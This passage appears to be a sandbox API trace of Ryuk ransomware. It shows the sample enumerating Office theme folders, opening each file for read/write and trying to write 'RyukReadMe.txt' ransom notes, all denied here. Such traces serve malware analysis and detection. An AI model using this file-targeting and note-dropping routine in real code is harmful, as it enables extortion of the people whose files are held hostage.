lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.663] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.663] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0132.708] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.708] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.708] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.709] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM", dwFileAttributes=0x80) returned 0 [0132.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.709] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.709] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.709] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.709] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.710] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF", dwFileAttributes=0x80) returned 0 [0132.755] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.755] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.755] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.755] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.755] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.756] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0132.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.756] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.756] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.756] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.756] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.756] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0132.802] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.802] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.802] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0132.802] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0132.802] SetLastError (dwErrCode=0x0) [0132.802] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.802] GetLastError () returned 0x5 [0132.802] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.803] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0132.803] SetLastError (dwErrCode=0x0) [0132.803] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.803] GetLastError () returned 0x5 [0132.803] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.803] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.803] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0132.849] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.849] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.849] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.849] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM", dwFileAttributes=0x80) returned 0 [0132.849] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.849] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.849] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.850] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.850] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.850] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF", dwFileAttributes=0x80) returned 0 [0132.850] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\boldstri.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.851] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.851] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.851] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.851] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.851] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0132.851] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.851] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.851] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.852] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.852] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0132.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.852] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.852] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.852] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0132.852] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0132.852] SetLastError (dwErrCode=0x0) [0132.853] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.853] GetLastError () returned 0x5 [0132.853] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.853] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.853] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0132.853] SetLastError (dwErrCode=0x0) [0132.853] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.853] GetLastError () returned 0x5 [0132.853] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.853] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.853] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0132.895] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.895] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.895] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.896] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM", dwFileAttributes=0x80) returned 0 [0132.896] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.896] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.896] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.896] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.896] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.896] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF", dwFileAttributes=0x80) returned 0 [0132.942] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.942] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.942] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.943] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.943] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0132.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.990] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.990] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.990] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.990] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.036] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.036] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.036] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.036] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.036] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.036] SetLastError (dwErrCode=0x0) [0133.036] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.037] GetLastError () returned 0x5 [0133.037] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.037] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.037] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.037] SetLastError (dwErrCode=0x0) [0133.037] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.037] GetLastError () returned 0x5 [0133.037] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.037] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.037] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.083] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.083] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.083] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.083] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM", dwFileAttributes=0x80) returned 0 [0133.129] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.129] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.129] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.130] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.130] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF", dwFileAttributes=0x80) returned 0 [0133.131] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.131] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.131] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.131] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.131] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.131] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.131] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.131] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.131] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.132] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.132] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.132] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.132] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.132] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.132] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.132] SetLastError (dwErrCode=0x0) [0133.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.132] GetLastError () returned 0x5 [0133.132] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.133] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.133] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.133] SetLastError (dwErrCode=0x0) [0133.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.133] GetLastError () returned 0x5 [0133.133] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.133] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.133] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.133] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.133] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.133] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.133] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM", dwFileAttributes=0x80) returned 0 [0133.134] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.134] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.134] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.134] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.134] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.134] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF", dwFileAttributes=0x80) returned 0 [0133.135] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.135] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.135] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.135] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.135] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.135] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.136] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), 